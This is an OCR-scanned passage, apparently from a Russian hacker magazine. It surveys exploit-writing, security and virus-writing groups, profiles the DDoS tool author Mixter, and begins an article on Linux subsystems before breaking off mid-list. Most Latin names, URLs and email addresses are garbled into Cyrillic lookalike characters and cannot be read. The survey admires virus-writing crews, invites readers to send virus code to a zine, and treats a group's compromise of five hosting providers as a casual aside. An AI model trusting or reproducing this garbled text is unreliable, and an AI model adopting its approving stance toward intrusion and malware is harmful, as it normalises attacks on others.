ЧЕСКИ ПИШУЩИЕ ПОПУЛЯРНЫЕ ПРОГРАММЫ, ЭКСПЛОИТЫ, ИНТЕРЕСНЫЕ СТАТЬИ, Л ИБО ОСТАЮТСЯ В ТЕНИ СВОИХ БОЛЕЕ 
ИМЕНИТЫХ КОЛЛЕГ, ЛИБО ПРОСТО НЕ ОЧЕНЬ ШИРОКО ИЗВЕСТНЫ. ИМЕННО О ТАКИХ БОЙЦАХ НЕВИДИМОГО ФРОНТА Я ТЕБЕ 
СЕЙЧАС РАССКАЖУ. 




6КАѴ-Ж0КЮ ТЕАМ 

НТТР://6КАУ-УУ0К1Р.ЫЕТ 

то команда, занимающаяся исследованием 
туннелирования, сетевых методов стеганог- 
рафии (то есть скрытия информации в текс- 
тах, изображениях и музыке), обходом бран- 
дмауэров и сетевой безопасностью. Парни 
проводят собственные исследования на 
эти темы и уже написали достаточное коли- 
чество интересных статей, включая «Ноѵѵіо 
соок а соѵегі сбаппеі» (о создании скрытых 
каналов) и «СоѵегіСИаппеІапсІТиппеІіпдоѵег 
{Не НИР ргоіосоі Эеіесііоп» (обнаружение 
скрытых каналов и туннелей). Также коман- 
да иногда пишет статьи в печатные издания 
соответствующей тематики, например, в 
НасіпЭ. 

Список релизов достаточно большой, вот 
самые интересные: Ссіі — программа для 
туннелирования произвольных данных ТСР 
и ІЮР в запросах ТСР, ІЮР и НТТР РРОЗТ 
от Зітоп'а Сазіго; МзпЗНеІІ — программа 
для удаленного контроля Ііпих-машин, за- 
щищенных брандмауэром от ѴѴеі 2Иепд'а; 
Рігеразз — тулза от нашего соотечественни- 
ка Алекса Дятлова, представляющая собой 
скрипт для создания туннелей, позволяю- 
щих обойти ограничения брандмауэра. Ос- 
тальные проги можно найти на сайте. 

Всего в тиме 9 человек: бегетіап (Польша), 
Апсігеаз Неубеске (Австрия), Нуа 2еІепсбик 
(Россия), Агип Эагііе Козбу (Австралия), 
Зітоп Сазіго (Франция), 2Нао ѴѴеі (Китай), 
баѵіег Магііпег Магіі (Испания), АІех ЭуаіІоѵ 
(Россия) и ѴѴеі 2Иепд (Китай). Как видишь, 
команда интернациональная. Почти все 
мемберы имеют свои веб-сайты. Группа до- 
статочно открыта, хотя для вступления в нее 
нужно иметь большое желание и знания. 
Пообщаться с членами дгау-ѵѵогісі можно 
на ІРС-канале ігс://ігс.0х557.ога:3331/агаѵ- 
ѵѵогІсІ.пе{ либонафорѵме ІіДр://агаѵ-ѵѵогІсІ.пе{/ 
ЬоагсІ. 



СІКТ 

НТТР;//СІКТ.ЫЕТ 

Это группазесигііу-энтузиастов, ккоторым 
известность пришла в середине 2002 года 
(сама тима существует с 2001 года), когда 
появилась первая версия одного из самых 
популярных скан еров уязвимостей — ІМікіо. 
Утилита даже попала на 16-ое место в топ- 
75сетевыхзесигі{у-тулз, и это неудивитель- 
но. Поддержка прокси, ЗЗІ_, плагинов и 
многих других фишек сделала этот сканер 
стандартом де-факто у многих специалис- 



тов. Упоминание о нем можно найти во мно- 
гих документах и книгах, посвященных се- 
тевой безопасности. Также ребята пишут 
плагины к не менее известному сканеру 
Ыеззиз, занимаются поиском уязвимостей 
и работают над другими проектами. 

ХР0СЦ5ТЕАМ 

НТТР;//ХГ0СЦ5.0К0 

Это одна из самых именитых и сильных ки- 
тайских команд, она известна несколькими 
нашумевшими эксплоитами под ѴѴіпбоѵѵз/ 
ІІпіх-платформы (например, для Місгозоіі 
301 Зегѵег и АрасНе ОрепЗЗІ_). Участни- 
ков этой некоммерческой организации по 
праву можно назвать старичками хак-сце- 
ны. Команда была создана 8 лет назад, а 
ее мемберы неоднократно светились на 
зесигііу-конференциях. 

Пообщаться с парнями можно на форуме 
ѵѵѵѵѵѵ.хІосиз.пеі/ЬЬз . 

ТНЕ НАСКЕК'5 СН01СЕ 

НТТРі//ТНС.5Е6ГАШТ.МЕТ 

Это, пожалуй, самая известная и сильная 
команда среди всех рассмотренных. ТНС 
— это немецкая группа, основанная в да- 
леком 1995 году и зарелизившая огромное 
количество эксплоитов, программ и тех- 
нических статей (в том числе для журнала 
Рбгаск). Почти все ее участники работают 
в крупных зесигііу-компаниях. А ведь изна- 
чально ТНС была сборищем фрикеров-эн- 
тузиастов и лишь со временем изменила 
свое направление. 

Думаю, ты не раз пользовался утилитами от 
этой группы, дай в] [авторы частоупомина- 
ют такую программу, как Нубга (брутфорс 
для многих сервисов). Также парни написа- 
ли много утилит для взлома беспроводных 
сетей, тулзу ЗесигеЭеІеіе для безопасного 
удаления данных, ѴРЫ-переборщик РРТР- 
Вгиіег, снифер ѴІоддег и генерилку креди- 
ток с проверкой на валидность СгесІ. 
Наиболее известные участники — ^бппу 
СуЬегрипк, Ѵап Наизег, РІазтоіб и РЭ — вы- 
пустили ряд эксплоитов к МЗЗОІ_, ІІпіх, 
РгееВЗЭ. Стоит упомянуть и остальных 
мемберов, каждый из которых имеет ог- 
ромный опыт и багаж знаний в пеі зесигііу: 
Зкурег, РеѵМооп, Эос Ноіібау, (Ватта, 
ОетЛге, Міпбтапіас, NN. Тіск, ѴѴбукіпд, 
ѴѴіІкіпз, Уапд. Сплоиты от ТНС — одни из са- 
мых популярных в мире, например, скрипт 
для МЗЗОІ- скачали более 30 тысяч чело- 
век, а для МісгозоШІЗ — примерно 70 тысяч. 
Лидер группы Ван Хаузер сейчас работает 



в Зизе І_іпих. Атмосфера внутри команды 
очень дружная, хакеры регулярно устра- 
ивают пивные вечеринки. На сайте можно 
найти много фоток и видео, записанных на 
этих тусовках. 

На диске есть видео с примерами исполь- 
зования некоторых программ. 

Для того чтобы стать членом группы Тбе 
Наскег'з СНоісе, нужно написать статью или 
утилиту на одну из тем, предложенных ее 
участниками (а темы там далеко не нубские). 

С0МРІЛЕКТЕКК0КІ5М 

С0МРЦТЕКТЕКК0КІ5М.С0М 

Эта группа из Великобритании, обосно- 
вавшаяся в Лондоне, основана в 1997 году. 
В отличие от других команд, представ- 
ленных в обзоре, она активно занимается 
коммерцией, осуществляя весь спектр 
услуг по информационной безопасности. 
Одним из самых известных членов этой 
команды является Зіиагі Реагзоп, написав- 
ший несколько эксплоитов к продуктам 
от МісгозоД, например, ІЕ «ѴѴІІХЮОѴѴЗ ()» 
ехріоіі, наделавший в свое время достаточ- 
но шумихи. 

514ТЕАМ 

НТТР;//514.Е5 

Это испанская команда, пока не очень из- 
вестная, но уже написавшая несколько 
эксплоитов и статей. Мемберы успели по- 
участвовать в конференции, проходившей 
на Майорке, и записать несколько видео- 
роликов, демонстрирующих «дырявость» 
ЫиеіооФ. 

Также в определенных кругах известна их 
программа ВЗЦІЫ2. Это перловый скрипт с 
ОІЛ-интерфейсом, созданный для подбора 
запроса при слепой зці-іпіесііоп . Возмож- 
ности у тулзы впечатляющие — брутфорс 
по словарю, работа через соксы, взаимо- 
действие с соокіез, обход ібз и т. д. 
Наиболее известные участники 514 Теат 
— Апбгез Тагазсо(фаундер команды), баѵіег 
ОІазсоада (написал несколько сплоитов), 
АІеіапбго Яатоз (автор вышеупомянутой 
утилиты). 

0ЕѴИТЕАМ 

НТТР://КАНІМ.ѴѴЕВР.РІ. 

Если ты периодически посещаешь багтра- 
ки, то уже должен был заметить эксплоиты с 
лейблом ЭеѵіІ Теат. Эта польская команда 
появилась в2001 году, по словам мемберов, 
«для проверки приложений на уязвимос- 
ти, помощи производителям в написании 
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безопасного кода и представлении поль- 
ских хакеров». Причем, кроме поляков, в 
тиме есть чехи, латыши, немцы, французы 
и парни из Словении. Поддержкой сайта 
занимаются админы І_еііо & І_ео. Список 
мемберов выглядит так: Тот2еп, Ѳеіо, 
Яатгез, ЭМХ, Сі2и, І_аггу, Эгаке, @з1егіосІ, 
Эггеѵѵко, Сга 22 уІ\д/ап, Ваттзіеіп, Абат®, 
Кісф™, ЭеаіНЗреесІ, Агкабіиз, Місііаз, рері, 
пикебсіх, ЗкЭ, МХ2. Самый известный и ак- 
тивный мембер — Касрег ака ВаЫт — ро- 
дился в Польше, а проживает в Люблине. 
ОТ незанимается и не планируетзанимать- 
ся коммерческой деятельностью. Внутри 
царит строгая иерархия — принимать и 
выгонять участников команды могут толь- 
ко фаундеры Касрег и ЭгадопНеагі (преце- 
денты уже были). В зависимости от актив- 
ности и знаний участник может получить 
ѴІР-статус, титул «оператора» или попасть 
в группу администраторов, поднимаясь та- 
ким образом по «карьерной лестнице». В 
паблик попадают около 80% найденных ко- 
мандой уязвимостей, остальные остаются 
для себя. 

Периодически происходят риаллайфовые 
встречи. ОТ считают себя ѵѵМіеНаі'ами, хотя 
с этим многие не согласны. Команда уже 
имела опыт общения с польской полицией, 
но это парней не останавливает, и нетакдав- 
но они хакнули за один день 5 хостингов, что 
отразилось на работе 500 тысяч сайтов. В 
будущем команда планирует создать боль- 
шой зесигііу-портал, ну а пока хакеры тусят 
на собственном ігс-канале 72.20.18.6:6667 
#беѵіІіеат, где ты можешь их найти. 

І0ЕРЕЫ5Е 

НТТР://ІРЕГЕЫ5Е.С0М 

Американская компания, находящаяся в 
Рестоне (США, штат Виржиния), постоянно 
подкармливает зесигііу-мир свежими экс- 
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плоитами (особенно, в продуктах от Билли 
Гейтса), а РогЬ практически каждый номер 
кидает им респекты в разделе «Обзор экс- 
плоитов»:). ЮЕРЕЫЗЕ была образована 
в 1998 году, и в настоящее время ее услу- 
гами пользуются как правительственные 
организации, так и коммерческие фирмы. 
Команда не только сама находит уязви- 
мости, но и покупает информацию о них 
у посторонних людей. Пример тому — ак- 
ция, прошедшая полгода назад, в которой 
ЮЕРЕІЧЗЕ предлагала по 10 килобаксов 
за каждую критическую багу, найденную 
в программах МісгозоД. Мой знакомый, да 
и я сам, интереса ради участвовали в этой 
«афере». Я уязвимостей не обнаружил, 
но пару спецов честно получили заветную 
сумму. 

Вообще, собственно компании ЮЕРЕІЧЗЕ 
сейчас не существует, это только бренд, 
так как год назад ѴегіЗідп — оператор до- 
менных имен, сот и. пеі — купила ЮЕР за 
40 миллионов вечнозеленых президентов, 
и сейчас есть л ишь ѴегіЗідп с одноименным 
подразделением. 

Самым известным представителем ком- 
пании является зесигііу-инженер Ребгат 
Атіпі ( Иіф://ребгат.гебЫѵе.сот ). занима- 
ющийся разработкой сетевых программ 
(бпз Ыіаскег, сопіизе гоиіег, реер зпі^ег). 
Параллельно он работает над плагинами 
для дизассемблеров ЮА Рго и ОІІуЭЬд, ад- 
минит сайт НПрУ/гесІЫѵе.сот . где тусят за- 
рубежные зесигііу-специалисты, и живет 
интересной жизнью в Канаде. 

І5ЕС 

НТТР://І5ЕС.РІ. 

Это уже вторая польская команда, упомина- 
ющаяся в данном обзоре. Вообще, в Поль- 
ше при небольших размерах страны доста- 
точно много компетентных специалистов. 



Именно эта группа выпустила небезызвест- 
ные ЫпихкегпеІ бо_Ьгк()ехрІоі1и ЫпихкегпеІ 
тгетар () ехріоіі, а также с десяток крити- 
ческих сплоитов для линуксового ядра. Эти 
тулзы можно назвать революционными в 
жанре сплоитостроения:). Автором боль- 
шинства из них являются специалисты 
мирового уровня РаиІ Зіаггеіг и ѴѴофіесІі 
Ригсгупзкі. Кроме них, в команде присутс- 
твуют Маигусу Ргосіеиз, ^пизгІЧіеѵѵіасІоппзкі 
и Ріоіг СНуІІа. В этом же составе іЗЕС и на- 
чала свое существование, правда, Маигусу 
Ргосіеиз присоединился чуть позже. Несмот- 
ря насвой профессионализм, іЗЕС'овцы не 
занимаются коммерческой деятельностью. 
Существуеткомандаужеб лет, ноходятслу- 
хи, что она ушла в полный приват. Да и сайт 
не обновляется уже больше года. 

6Е02АСѴИШ5еВ(ШР 

НТТР;//0ЕР2АС.С0М 

Это испанская команда, в настоящее вре- 
мя одна из самых активных ѴХ-групп. Она 
основана в 2002 году, выпускает свой жур- 
нал ОесЫас Мііозіз ЕЫпе с качественными 
статьями и сорцами вирусов. Е-зин выходит 
раз в год, и следующий, уже четвертый по 
счету, появится не ранее чем через 6 меся- 
цев. Но ты всегда можешь ускорить выход 
журнала, отослав свою статью. Почти все 
мемберы — или латиноамериканцы (Ар- 
гентина, Чили, Мексика, Венесуэла), или 
испанцы, соответственно, и разговарива- 
ютони между собой наиспанском. Возраст 
участников от 15-ти до 25-ти лет, большинс- 
тво — студенты, для которых вирусы — это 
хобби. По словам парней, на создание 
одного виря уходит около недели. Как и 
многие ѴХ-группы, мемберы ОЕЭ2АС либо 
вообще не пишут вредоносных программ, 
либо не выпускают их в свет. Риаллайфо- 
вые встречи не проводятся, а все общение 
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сцена 




протекает через веб или по телефону. Фа- 
ундером группы является 25-летний Рапа 
Іпіегпо, который сейчас работает програм- 
мистом в Сантьяго, параллельно консуль- 
тируя фирмы по вопросам информацион- 
ной безопасности. 

ОЕЭ2АС — это главный представитель ис- 
панской ѴХ-сцены, своего рода «школа» 
элитных вирусмейкеров. Попасть в груп- 
пу очень сложно, разве что если ты напи- 
шешь что-то действительно выдающееся. 
Раньше у тимы были серьезные проблемы 
с антивирусными компаниями, так как один 
из мемберов выпустил червя, обходящего 
многие антивири. Антивирусники даже вы- 
купили домен аесІгасТк . который до этого 
бесплатно юзался ОЕЭ2АС дгоир. Из-за 
разгоревшегося конфликта команда была 
на грани распада, но все обошлось. В бу- 
дущем парни планируют распространять 
свой журнал на разных языках в как можно 
большем количестве стран. 

»3наменитый сканер ІЧікІо 




ВВІ.Г 

ѴХ.ЫЕТШХ.ОВѲ/ВВІ.Г 

Веабу Рапдегз ЫЬегаЯоп Ргопі — междуна- 
родная группа вирусмейкеров, основанная 
в2001 году в Германии. ФаундеррМІеЮазіЗг 
был выходцем издругой команды — ЗаІІуОпе 
(Згоир. Многие считают гРІТ сильнейшими 
представителями современной ѴХ-сцены 
(если не считать 29А), у них даже брали ин- 
тервью для журнала ТНе ІЧеѵѵ Ѵогк Тітез и 
других печатных изданий. Тима выпускает 
журнал ЯРЕЕ е2іпе (ІіирѴ/ггІі-гіпе.сІе.ѵи Г 
который недавно пополнился седьмым но- 
мером. Внутри можно найти более 20-ти да- 
леко недетских статей и с полсотни новых 
вирусов. Принять участие в создании жур- 
нала может любой желающий, достаточно 
прислать свою статью или код вируса в ар- 
хиве на етаіі ЭіА _ИаІез_тасИіпе@дтх.сІе. 
Также есть возможность вступить в группу 
после успешного собеседования с основа- 
телем (рМІеЮазіЗг@дтх.сІе). Кстати, ста- 
тьи мемберов гЯІІ публиковались и в дру- 
гих ѴХ- 2 іп’ах: РеііКѴХ Е2іпе, Вгідасіа ОсНо 
Е- 2 Іпе, ОСА, І_оѵѵІ_еѵеІ и 29А. 

Вот список всех участников, которые ког- 
да-либо входили в группу: асііоиз, АІсоРаиІ, 
аззаззіп007, ВІиеОѵѵІ, супеох, Оі А, сІізкОгсІ іа, 
Эоіотііе, бг. д0п2о, ЭѵІ_, ЕІ ЭибЕгіпО, 
Епегду, Іпбизігу, КеЯ, ІХесгопотікоп, ЫеО, 
РеЯК, рМІеЮазіЗг, рраскеі, рРе4СІг_0_23, 
рзусітоіодіс, газіаіагіе, Яеіго, Зесопб Раб 
То НеІІ, зіпВгаіп, ТеАдеСе, 2еб. Правда, 
сейчас он сократился до семи человек: 
ВІиеОѵѵІ (18 лет, Нидерланды), супеох 
(18 лет, Румыния), НиЯеу (21 год, Брази- 
лия), ЭіА (19 лет, Германия), рМІеЮазІЗг 
(23 года, Германия), Яеіго(23 года, Англия) 
и Зесопб РаіТТо НеІІ (19 лет, Австрия). 

Один из самых известных и активных 
участников команды — Зесопб Рагі То 
НеІІ — в 2004 году написал вирус для 



» 



МепиеЮЗ (Мепиеі/СОМ. Тгізіеззе), а сов- 
сем недавно появился его вирь МЗН/СіЬу 2 
для ѴѴіпбоѵѵз Ѵізіа. Этот парень в свои 19 
уже не раз успел потрепать нервы антиви- 
русным компаниям. 

Среди планов на будущее — вирусы 
для КПК. 

000МШ0ЕК2 

роомкіРЕкг.со.ык 

Это самая молодая группа в обзоре, она 
былаоснованавсегобмесяцевназадвирус- 
мейкером Зупде, который раньше состоял 
в КпоѵѵбеЯт В команду входиттри человека: 
американцы Зупде и ОепеЯх, атакже немец 
ІгееОп. Трое других мемберов, в том числе 
широко известный Месгопоппікоп, были не- 
давно «уволены» за безделье. Цель груп- 
пы — помочь нынешней ѴХ-сцене встать 
на ноги. Ребята не пишут и не планируют 
писать какие-либо вирусы или программы 
на заказ, а вся их работа основывается на 
принципе ^зНог Тип. 

ЭТР ЕЩЕ НЕ КОНЕЦ 

Журнал не резиновый, и многие достойные 
команды остались за кадром. Тем не менее, 
хочу привести здесь названия еще несколь- 
ких групп, уровень знаний и компетентность 
которых не вызывают сомнений: 

ВиНа Зесигііу Соттипііу, Эатпеб Апдеіз 
Теат,Оо1іаиІіЗесигііуСоттипііу,ЕхрІоШаЬз, 
Ореп Зесигііу Огоир, ЗесѴѴаісф 0x557 дгоир, 
ѴОЮ, КЭ-Теат, Г-13 І_аЬз, РІгеагІезз. Ш 



> ЬзрІЫ" 




ХАКЕР 1 1 /95/ 06 



/ 107 







цена 



141 



1 



ОЛЕГ «МІЫРѴѴОВК» ЧЕБЕНЕЕВ 

! М1ЫО№ОПК@САМЕЬАЫО..Б.и / 






ІХ-РгОРіІ_Е 



ПСЕВДОНИМ: МІХТЕР 

ВОЗРАСТ: 23 ГОДА 

МЕСТО ОБИТАНИЯ: ГЕРМАНИЯ 

ЛИЧНАЯ СТРАНИЧКА: НТТР://МІХТЕВ.ѴОЮ.ПІІ 

Е-МАІЬ ДЛЯ СВЯЗИ: МІХТЕР@НАСКТІѴІЗМО.СОМ 



ЗАСЛУГИ: В 2000 году Міхіег выиграл конкурс по защите от РОоЗ-атак, объявленный отцом зесигііу- 
портала Раскеі Зіогт. За победу в конкурсе он получил $10к и кучу энтузиазма. Уже в 2003 году разра- 
ботанная им система Зіх/Роиг получила признание и поддержку Министерства Коммерции США. 

ОФИЦИАЛЬНАЯ РАБОТА: В 2000 году он перебрался в Израиль и стал работать на зесигііу-орга- 
низацию 2X3, президентом и основателем которой был известный взломщик серверов Пентагона 
— Апаіугег. Там Міхіег занимался проведением репеігаііоп-тестов, поддержкой ЗАЗЗ (ЗІапбАІопе 
Зесигііу Зузіет) и другими вещами. А попутно подрабатывал, сотрудничая с израильскими банками, 
интернет-провайдерами и институтами. Сейчас работает в немецкой зесигііу-компании. 

ДРУЖБА С ФБР: В феврале 2000 года состоялась широкомасштабная атака ряда крупных сайтов, 
включая Уабоо, еВау, Атагоп, СЫІМ, МЗЫ, Е-Ігабе, 20МеІ и Ьиу.сот. Как выяснилось, сделана она 
была с помощью утилиты ТРЫ2К, написанной Міхіег'ом. Хакера тут же приняли парни из РВІ, и, хотя 
он прямого отношения к атаке не имел, маховик судебной системы США упрятал парня наб месяцев 
втюрьму. Но он не досидел свое — засотрудничествос органами (он слил нескольких пакистанских 
хакеров-антисемитов) его отпустили. В 2002 году посадили его приятеля Апаіугег'а, известного по 
взломам Пентагона. 

ХОББИ/ИНТЕРЕСЫ: Заводить друзей по всему миру, распределенные приложения и системы децен- 
трализованного Р2Р, философия, изучение и противостояние действующим органам власти, био- 
химия и биоинформатика (особенно вопросы продления жизни), информационная безопасность и 
поискуязвимостей, орепззі, АЫЗІ С++. 

ДЕЙСТВУЮЩИЕ ПРОЕКТЫ: Міхіег продолжаетактивноучаствовать в проектах «хактивизма»,занима- 
ясь написанием орепзоигсе-программ. Большую часть свободного времени он дорабатывает Зіх/Роиг 
- свободный от любой цензуры и ограничений прокси-сервер, функционирующий на основе Ігивіеб 
реегз и шифрующий трафик через ЗЗІ_. Помимо этого, Міхіег работает над парой приватных проектов 
и состоите двух группах: русской ѴОЮ и американской СиІЮІІІіе ОеасІ Соѵѵ. 

ЛЮБИМАЯ МУЗЫКА: Амбиент, пситранс, классическая. 

ЗНАКОМСТВО С АНДЕГРАУНДОМ: В 15 лет Міхіег попал в ІЯС ца сервер ЕРпеІ, где познакомился со 
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«Многие меня спрашивают, почему я написал такие программы, как ТРИ, 
которые скрипт-киддисы могут применять для проведения ОйоЗ-атак. 
Не стоитзабывать, чтотутестьи другая сторона. Кодтакой программы по- 

казываетпотенциальныеопасности,убыстряетпоискспособовзащиты. 

Такая концепция называется «Полное раскрытие». И обвинять меняв том, 
что кто-то использует мои программы в деструктивных целях, глупо». 



многими представителями андеграунда и начал экспериментировать с написанием разных скриптов и 

ІРС-ботов, например Епіііу. Параллельно этому хакер изучал способы проникновения в защищенные 
удаленные системы, активно применяя их на практике. Некоторые из захваченных серверов затем 
служили для тестирования написанных ирк-ботов. 

ПЕРВЫЙ КОМПЬЮТЕР: С64, появился у Міхіег’а в возрасте шести лет. * 

РЕЛИЗ: іагда утилита для проведения ОоЗ-атак (сейчас уже доступна третья версия 
проги). Позже появился ТРЫ2К (ТгіЬе РІоосІ Ыеіѵѵогк) — более продвинутый ООоЗ’ер со множеством 
вариантов атак, стелс-режимом и поддержкой прокси. Именно он принес своему автору широкую 
известность. 

ДРУГИЕ ПРОЕК Ы: Система определения хакерских атак Зрібегпеі, ЗЗН-подобный удаленный сер- 

верОсвозможностьюкриптошифрования,пакетсетевыхишифровальныхфункцийІ_іЬтіх, несколько 

распределенных снифферов. По его словам, самым интересным проектом, над которым он работал в 
то время, стал ЫЗАТ (Ыеіѵѵогк ЗесипЧу Апаіузіз ТооІ) — сетевой сканер для пассивной идентификации 
ІР-сервисов и сбора информации о происходящих процессах. Помимо софтварных проектов, Міхіег 
написал множество статей и документаций, включая «Ргоіесііпд адаіпзі ібе ипкпоѵѵп», «Аиіотаііоп 
Роіепііаіз ію г ІТ зесигііу», «Виііег оѵегііоѵѵ боѵѵіо», «Рагапоіа ѵз. Тгапзрагепсу». ц-с 



«Главной проблемой являются не компьютерные взломщики, а уязви- 
мость компьютеров в сети. ФБР может поймать сотни людей, которых 
они называют «хакерами», но, пока остаются баги, проблема не будет 



решена». 



і 




(ЕВГЕНИЙ «ЛМ» ЗОБНИН 



ЧЕРЕЗ РЕВОЛЮЦИЮ 
К ЭВОЛЮЦИИ 



ОБЗОР КЛЮЧЕВЫХ ТЕХНОЛОГИЙ *ЫІХ 



ПРОЦЕСС РАЗРАБОТКИ ОПЕРАЦИОННЫХ СИСТЕМ СЧИТАЕТСЯ ОДНИМ ИЗ САМЫХ СЛОЖНЫХ И ТРУДОЕМКИХ В ИНДУСТРИИ ПРО- 
ГРАММНОГО ОБЕСПЕЧЕНИЯ. КОГДА В ПРОДУКТ ВЛОЖЕНО ОГРОМНОЕ КОЛИЧЕСТВО ДЕНЕГ И СИЛ ПРОГРАММИСТОВ, МАЛО КТО 
МОЖЕТ ПОЗВОЛИТЬ СЕБЕ ПРОСТО ВЗЯТЬ И ВЫБРОСИТЬ КОД, А ЗАТЕМ НАЧАТЬ ВСЕ СНАЧАЛА ТОЛЬКО ПОТОМУ, ЧТО ОПЕРАЦИ- 
ОННАЯ СИСТЕМА НЕ СООТВЕТСТВУЕТ ТЕКУЩЕМУ ПОЛОЖЕНИЮ ДЕЛ. ОДНАКО В ИСТОРИИ РАЗВИТИЯ ИНОГДА СЛУЧАЮТСЯ ПЕ- 
РЕЛОМНЫЕ МОМЕНТЫ, НАПРИМЕР, КОГДА ОДИН ИЗ КОМПОНЕНТОВ ОТМИРАЕТ, А ЕМУ НА СМЕНУ ПРИХОДИТ ДРУГОЙ, БОЛЕЕ 



СОВЕРШЕННЫЙ. 



ервым таким переломным мо- 
ментомбыл, конечно же, выпуск 
Біпих версии 0.01 в 1991 году. 
Далее последовала целая чере- 
да «переломов»: стек сетевых протоколов, 
подсистема ѴРЗ, файловая система ех{ и 
множество других принципиальных и зна- 
чительных изменений. Но все это — исто- 
рия, имеющая к современной реальности 
лишь косвенное отношение. Ее мы затра- 
гивать не будем, а обратимся к тем ключе- 
вым разработкам Ыпих-сообщества, кото- 
рые были актуальны на момент написания 
этой статьи. 

/ по 



Оех12 и ехІЗ 

Первые версии ядра Ыпих использовали 
16-битную файловую систему Міпіх. Ее мак- 
симальный размер составлял 64 Мб, а длина 
имени файла не могла превышать 14-ти сим- 
волов. Эти ограничения были совершенно 
неприемлемы, поэтому спешно началась 
работа над файловой системой ехі (ехіепбесі 
— расширенная ФС). Новая ФС имела огра- 
ничение в 2 Гб и распознавала имена файлов 
длиной до 255 символов. Однако проблемы, 
связанные с неудовлетворительной расши- 
ряемостью и отсутствием поддержки дат мо- 
дификации файлов, так и не были решены. 



Следующий этап эволюции — ех!2, создан- 
ная с нуля. Вторая реинкарнация расширен- 
ной файловой системы могла иметь размер 
до 4 Тб и позволяла выбирать размер блока. 
Благодаря продуманному дизайну ех{2 можно 
было с легкостью усовершенствовать, и вско- 
ре для нее появились реализации АСЬ и рас- 
ширенных атрибутов файлов. Позднее драй- 
вер ех{2 оптимизировали, и она стала самой 
быстрой файловой системой для Ыпих. 

Новая ФС не имела серьезных проблем, но 
компанию Веб На{ прельстила возможность 
ведения журнала. Так была создана ехіЗ, 
которая не только стала наследницей ех!2, 
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но по сути повторяла ѳѳ, позволяя включить журналиро- 
вание как опцию. Также была проведена работа по опти- 
мизации структуры каталогов и добавлена возможность 
увеличения размера уже существующей файловой сис- 
темы. При этом ехІЗ не только позволяла подключать себя 
как обычную ех{2, но и могла быть преобразована из ех!2 
одной лишь командой без необходимости в перезагрузке. 
ЕхіЗ отличало и то, что она давала возможность использо- 
вать разные типы журналирования: от полного (в журнал 
помещаются данные и метаданные) до классического (жур- 
налируются только метаданные). 

ОБуз^зиисІеѵ 

Одной из самых интересных и полезных отличительных черт 
ІЛЧІХ-подобных ОС является способ работы с оборудова- 
нием, который основывается на идее файлов устройств. 
Однако и здесь не обошлось без головной боли для раз- 
работчиков и рядовых пользователей. Сначала возникла 
проблема конфликтов номеров устройств. Ее решением 
занялась І_АІ\ІАІ\ІА ( ѵѵѵѵѵѵ.Іапапа.ога У и вроде бы все утряс- 
лось. Но вскоре выяснилось, что каталог/беѵ стал слишком 
загроможденным и пользователей это категорически не уст- 
раивает. Тогда была создана сіеѵіз — виртуальная файловая 
система, используя которую ядро получило возможность 
создавать элементы каталога/беѵ только для устройств, ре- 
ально присутствующих в системе. И как будто опять все нор- 
мализовалось, но возникла новая проблема, которая заклю- 
чалась в том, что 8-битных номеров устройств стало просто 
недостаточно. Так появилась идея создания исіеѵ. 

Огед Кгоаб-Нагітап, спроектировавший и реализовав- 
ший исіеѵ, убил сразу всех мыслимых зайцев. ІІсІеѵ реша- 
ет как все уже перечисленные проблемы, так и многие 
другие. Во-первых, исіеѵ — это реализация менеджера 
файлов устройств на пользовательском уровне, что авто- 
матически разгружает ядро. Во-вторых, исіеѵ не зависит 
от номеров устройств, что решает проблему их нехватки. 
В-третьих, исіеѵ предоставляет пользователю возмож- 
ность самому назначать имена файлов. И наконец, исіеѵ 
представляет специальный АРІ, основанный на О-ВЕІЗ, так 
что любая программа может получить список подключен- 
ных устройств и своевременно узнать об их подключении и 
отключении. 

Демон ибеѵсі тесно работает с подсистемой иеѵепі ядра 
І_іпих и файловой системой зузіз, предоставляющей избы- 
точную информацию о присутствующих устройствах. 



ОАІ.5А 

Проект АІ_5А (АбѵапсесІ І_іпих Зоипб АгсНііесіиге) был 
начат еще в 1998 году с целью полностью заменить ус- 
таревшую звуковую подсистему ядра І_іпих. Прежний 
код, основанный на интерфейсе 033, имел несколько 
серьезных недостатков, среди которых — отсутствие 
полноценной поддержки синтеза МЮІ и микширования 
звуковых потоков средствами звуковой карты, а также 
неприспособленность драйверов для работы в мульти- 
процессорных системах. Кроме того, по причине плохой 
поддержки возможностей профессиональных звуковых 
карт и ограниченности самого интерфейса 033, Ыпих 
нельзя было применять для профессиональной работы 
со звуком. Разработчики АІ_ЗА, всегда делавшие упор на 
профессиональное оборудование, решили эти пробле- 
мы и открыли для І_іпих дверь в мир электронной музыки. 
Новые драйверы и звуковая подсистема были включены 
в нестабильное ядро 2.5.4, а в версии 2.6.18 полностью 
вытеснили 033. 

Помимо решения основных проблем подсистемы 033, 
АІ_ЗА добавил Ыпих такие возможности, как полностью ав- 
томатизированное распознавание и настройка звуковой 
карты, удобная настройка совместной работы нескольких 
звуковых устройств, полнодуплексные операции, комфор- 
тный АРІ, предоставляемый специальной библиотекой. 
Последние версии АІ_ЗА позволяют выполнять програм- 
мное микширование звуковых потоков, тем самым осво- 
бождая нас от необходимости в установке и настройке 
звуковых серверов. Нельзя не упомянуть о том, что АІ_ЗА 
умеет эмулировать интерфейс 033, следовательно «уста- 
ревшие» программы с новой звуковой подсистемой будут 
работать корректно. 

ПРІІ5Е 

РІІЗЕ (Рііезузіет іп ІІЗЕгзрасе) — это одна из тех техноло- 
гий, которые следовало бы включить еще в первые выпус- 
ки ядра Ыпих. Идея РІІЗЕ пришла к нам из микроядерных 
операционных систем и базируется на концепции вынесе- 
ния подсистем ядра в пространство пользователя, то есть 
в обычные программы. РИЗЕ позволяет поместить драйвер 
файловой системы в программу, избежав таким образом 
модификации и перекомпиляции ядра. При этом достига- 
ются 4 цели: 

1 . Позволить непривилегированному пользователю со- 
здавать и подключать файловые системы. 



ЭТО 

> Наглядное подтверж- 
дение консерватизма 
разработчиков РгееВЗй: 
одним из немногих 
официальных разработ- 
чиков, решившихся на 
кардинальное измене- 
ние кода РгееВЗР, был 
Мэтью Диллон, но его 
благополучно проигно- 
рировали, и он создал 
свой форк РгееВЗР 
— йгадопРІу (подроб- 
нее о нем читай в моей 
статье «Верхом на 
стрекозе»). Символично 
то, что очень немногие 
последовали за ним в 
новый проект. 

«Ыпих — это эволю- 
ция, а не продуманный 
дизайн», — сказал 
однажды Линус Тор- 
вальдс, намекая нато, 
что не следует ожидать 
от ядра Ыпих грамотной 
архитектуры. 
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> Классический примертопологии (ЗЕОМ 



2 . Получить возможность представления лю- 
бых сущностей в виде файловой системы, 
